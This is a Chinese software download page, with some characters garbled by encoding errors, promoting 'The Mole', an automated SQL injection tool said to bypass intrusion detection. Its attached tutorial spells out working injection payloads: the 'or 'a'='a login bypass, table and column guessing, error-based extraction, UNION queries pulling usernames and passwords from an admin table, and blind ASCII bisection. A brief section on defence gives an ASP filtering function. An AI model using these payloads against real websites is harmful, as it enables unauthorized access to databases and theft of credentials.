the mole工具(自動化SQL注入工具)
v0.3 英文命令行工具_(dá)附教程- 軟件大?。?span itemprop="fileSize">4.94 MB
- 軟件語言:中文
- 軟件類型:國產(chǎn)軟件 / 系統(tǒng)安全
- 軟件授權(quán): 免費(fèi)軟件
- 更新時間:2017-06-02 16:33:34
- 軟件等級:
- 軟件廠商: -
- 應(yīng)用平臺:WinAll, WinXP, Win7
- 軟件官網(wǎng): 暫無
相關(guān)軟件
pangolin(穿山甲sql注入工具)v4.1 綠色多語版
30.80 MB/中文/0.0
盛世龍城滿v公益服v2.6 安卓bt版
314.60 MB/中文/10.0
(win10安裝apk)Windows 10 Mobile APK Installerv1.1 官方版
10.60 MB/中文/10.0
Havij pro(自動化SQL注入工具)v1.19 特別版
6.30 MB/中文/7.0
明小子sql注入工具v10.10.10 綠色版
3.90 MB/中文/10.0
軟件介紹人氣軟件精品推薦相關(guān)文章網(wǎng)友評論下載地址
the mole注入工具是有sql注入需要的用戶們不可錯過的強(qiáng)大工具,有了該軟件,用戶們就會發(fā)現(xiàn)注入sql會變得簡單許多,具體的軟件介紹如下,有需要的朋友們歡迎前來下載!
the mole官方介紹:
The Mole是一款開源的自動化SQL注入工具,其可繞過IPS/IDS(入侵防御系統(tǒng)/入侵檢測系統(tǒng)).只需提供一個URL和一個可用的關(guān)鍵字,它就能夠檢測注入點(diǎn)并利用.The Mole可以使用union注入技術(shù)和基于邏輯查詢的注入技術(shù).The Mole攻擊范圍包括SQL Server、MySQL、Postgres和Oracle數(shù)據(jù)庫
sql的注入方法:
方法1
后臺身份驗(yàn)證繞過漏洞
驗(yàn)證繞過漏洞就是'or'='or'后臺繞過漏洞,利用的就是AND和OR的運(yùn)算規(guī)則,從而造成后臺腳本邏輯性錯誤
例如管理員的賬號密碼都是admin,那么再比如后臺的數(shù)據(jù)庫查詢語句是
user=request("user")
passwd=request("passwd")
sql='select admin from adminbate where user='&'''&user&'''&' and passwd='&'''&passwd&'''
那么我使用'or 'a'='a來做用戶名密碼的話,那么查詢就變成了
select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a'
這樣的話,根據(jù)運(yùn)算規(guī)則,這里一共有4個查詢語句,那么查詢結(jié)果就是 假or真and假or真,先算and 再算or,最終結(jié)果為真,這樣就可以進(jìn)到后臺了
這種漏洞存在必須要有2個條件,第一個:在后臺驗(yàn)證代碼上,賬號密碼的查詢是要同一條查詢語句,也就是類似
sql="select * from admin where username='"&username&'&"passwd='"&passwd&'
如果一旦賬號密碼是分開查詢的,先查帳號,再查密碼,這樣的話就沒有辦法了.
第二就是要看密碼加不加密,一旦被MD5加密或者其他加密方式加密的,那就要看第一種條件有沒有可以,沒有達(dá)到第一種條件的話,那就沒有戲了
方法2
先猜表名
And (Select count(*) from 表名)<>0
猜列名
And (Select count(列名) from 表名)<>0
或者也可以這樣
and exists (select * from 表名)
and exists (select 列名 from 表名)
返回正確的,那么寫的表名或列名就是正確
這里要注意的是,exists這個不能應(yīng)用于猜內(nèi)容上,例如and exists (select len(user) from admin)>3 這樣是不行的
很多人都是喜歡查詢里面的內(nèi)容,一旦iis沒有關(guān)閉錯誤提示的,那么就可以利用報(bào)錯方法輕松獲得庫里面的內(nèi)容
獲得數(shù)據(jù)庫連接用戶名:;and user>0
這個是小竹提出來的,我這里引用《SQL注入天書》里面的一段話來講解:
"重點(diǎn)在and user>0,我們知道,user是SQLServer的一個內(nèi)置變量,它的值是當(dāng)前連接的用戶名,類型為nvarchar.拿一個 nvarchar的值跟int的數(shù)0比較,系統(tǒng)會先試圖將nvarchar的值轉(zhuǎn)成int型,當(dāng)然,轉(zhuǎn)的過程中肯定會出錯,SQLServer的出錯提示是:將nvarchar轉(zhuǎn)換int異常,XXXX不能轉(zhuǎn)換成int"
看到這里大家明白了吧,報(bào)錯的原理就是利用SQLserver內(nèi)置的系統(tǒng)表進(jìn)行轉(zhuǎn)換查詢,轉(zhuǎn)換過程會出錯,然后就會顯示出在網(wǎng)頁上,另外還有類似的and 1=(selet top 1 user from admin),這種語句也是可以爆出來的.;and db_name()>0 則是暴數(shù)據(jù)庫名.
一旦關(guān)閉了IIS報(bào)錯,那么還可以用union(聯(lián)合查詢)來查內(nèi)容,主要語句就是
Order by 10
And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
And 1=2 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
上面的order by 10主要就是查字段數(shù)目,admin就是表名,可以自己猜,user,passwd是列名
反正就是返回正確即對,返回異常即錯
另外還有十分常用的ASCII碼拆半法
先要知道指定列名,例如user里的內(nèi)容的長度
and (select len(user) from admin)=2 就是查詢長度為不為2位,返回錯誤的增加或減少數(shù)字,一般這個數(shù)字不會太大,太大的就要放棄了,猜也多余
后面的邏輯符號可以根據(jù)不同要求更改的,
>;大于 <;小于 =就是等于咯,更新語句的話,=也可以表示傳遞符號 <>;就是不等
知道了長度后就可以開始猜解了
And (Select top 1 asc(mid(user,n,1)) from admin)>100
n就是猜解的表名的第幾位,最后的長度數(shù)字就是剛才猜解出來的列名長度了,And (Select top 1 asc(mid(user,1,1)) from admin)>100 就是猜解user里內(nèi)容的第一位的ASCII字符是不是大于100
正確的話,那么表示USER第一個字符的ASCII碼大于100,那么就猜>120,返回錯誤就是介于100-120之間,然后再一步一步的縮少,最終得到正確字符XXX,然后用ASCII轉(zhuǎn)換器吧這個轉(zhuǎn)換成普通字符就可以了
然后就是第二位 And (Select top 1 asc(mid(user,2,1)) from admin)>100 一直猜下去
加在url后面,列名表名還是先猜解,返回正確的代表帳號的ASCII碼大于100,那么就再向前猜,直到報(bào)錯,把猜出來的ASCII碼拿去ASCII轉(zhuǎn)換器轉(zhuǎn)換就可以了,中文是負(fù)數(shù),加上asb取絕對值
And (Select top 1 asb(asc(mid(user,n,1))) from admin)>15320
得到之后就記得在數(shù)字前加-號,不然ASCII轉(zhuǎn)換器轉(zhuǎn)換不來的,中文在ASCII碼里是-23423這樣的,所以猜起來挺麻煩
這個猜解速度比較慢,但是效果最好,最具有廣泛性
方法3
防御方法
對于怎么防御SQL注入呢,這個網(wǎng)上很多,我這里講幾個
如果自己編寫防注代碼,一般是先定義一個函數(shù),再在里面寫入要過濾的關(guān)鍵詞,如select ; "";from;等,這些關(guān)鍵詞都是查詢語句最常用的詞語,一旦過濾了,那么用戶自己構(gòu)造提交的數(shù)據(jù)就不會完整地參與數(shù)據(jù)庫的操作.
當(dāng)然如果你的網(wǎng)站提交的數(shù)據(jù)全部都是數(shù)字的,可以使用小竹提供的方法
Function SafeRequest(ParaName,ParaType)
'--- 傳入?yún)?shù) ---
'ParaName:參數(shù)名稱-字符型
'ParaType:參數(shù)類型-數(shù)字型(1表示以上參數(shù)是數(shù)字,0表示以上參數(shù)為字符)
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "參數(shù)" & ParaName & "必須為數(shù)字型!"
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function
然后就用SafeRequest()來過濾參數(shù) ,檢查參數(shù)是否為數(shù)字,不是數(shù)字的就不能通過.
the mole工具測評:
The Mole是一款自動化的SQL注入漏洞利用工具.只需提供一個URL和一個可用的關(guān)鍵字,它就能夠檢測注入點(diǎn)并利用.The Mole可以使用union注入技術(shù)和基于邏輯查詢的注入技術(shù).
更多>> 軟件截圖
推薦應(yīng)用
騰訊電腦管家pc版安裝包 62.96 MB
下載/中文/5.0 v15.4.22893.220 官方最新版火絨互聯(lián)網(wǎng)安全軟件 22.07 MB
下載/中文/8.0 v5.0.71.2-2022.11.21.1 官方版QQ電腦管家2022最新版 62.12 MB
下載/中文/5.0 v15.4.22893.220 官方版2345安全衛(wèi)士電腦版 95.54 MB
下載/中文/5.0 v7.9.1.13925 官方正式版360游戲保險(xiǎn)箱 9.18 MB
下載/中文/10.0 v7.3.1.1011 官方正式版金山急救箱單文件版 26.27 MB
下載/中文/10.0 v3.5 免費(fèi)綠色版網(wǎng)站安全狗 36.90 MB
下載/中文/10.0 v4.0.22290 官方iis版360安全保險(xiǎn)箱(360Safebox) 5.84 MB
下載/中文/10.0 v5.0 綠色版
其他版本下載
精品推薦 sql注入工具
- 更多 (9個) >> sql注入工具 SQL注入工具是一系列可以幫助用戶們進(jìn)行SQL注入的軟件工具,SQL注入是指通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令,致使非法數(shù)據(jù)侵入系統(tǒng).由于SQL注入利用的是正常的HTTP服務(wù)端口,表面上看來和正常的web訪
pangolin(穿山甲sql注入工具) 30.80 MB
/中文/0.0bsql hacker(SQL自動注入工具) 2.82 MB
/中文/10.0Havij pro(自動化SQL注入工具) 6.30 MB
/中文/7.0明小子sql注入工具 3.90 MB
/中文/10.0SQLmap免python環(huán)境綠色版本 21.40 MB
/中文/10.0NBSI注入漏洞檢測工具 119.00 KB
/中文/10.0the mole工具(自動化SQL注入工具) 4.94 MB
/中文/0.0sqlmap(sql注入測試工具) 21.40 MB
/中文/10.0
相關(guān)文章
下載地址
the mole工具(自動化SQL注入工具) v0.3 英文命令行工具_(dá)附教程
查看所有評論>> 網(wǎng)友評論
更多>> 猜你喜歡